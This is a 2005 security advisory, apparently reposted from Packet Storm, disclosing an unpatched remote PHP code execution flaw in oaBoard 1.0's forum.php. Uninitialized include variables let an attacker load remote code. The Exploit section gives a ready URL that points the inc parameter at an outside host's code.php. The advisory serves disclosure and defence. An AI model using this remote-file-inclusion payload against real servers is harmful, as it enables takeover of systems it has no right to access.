EV0003.txt

2006-01-04T00:00:00
ID PACKETSTORM:42765
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
oaBoard PHP Code Execution  
  
--------------------Summary----------------  
  
Software: oaBoard  
Versions: 1.0  
Critical Level: Dangerous  
Type: PHP Code Execution  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2005.12.29  
eVuln ID: EV0003  
  
-----------------Description--------------  
Vulnerable scripts:  
forum.php  
  
Variables $inc and $inc_stat isn't initialized before being used in the include(). This can be used to execute arbitrary PHP code.  
  
Condition: register_globals = on  
  
--------------Exploit---------------------  
http://host/oaboard_en/forum.php?inc=http://anotherhost/code.php  
  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/3/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
`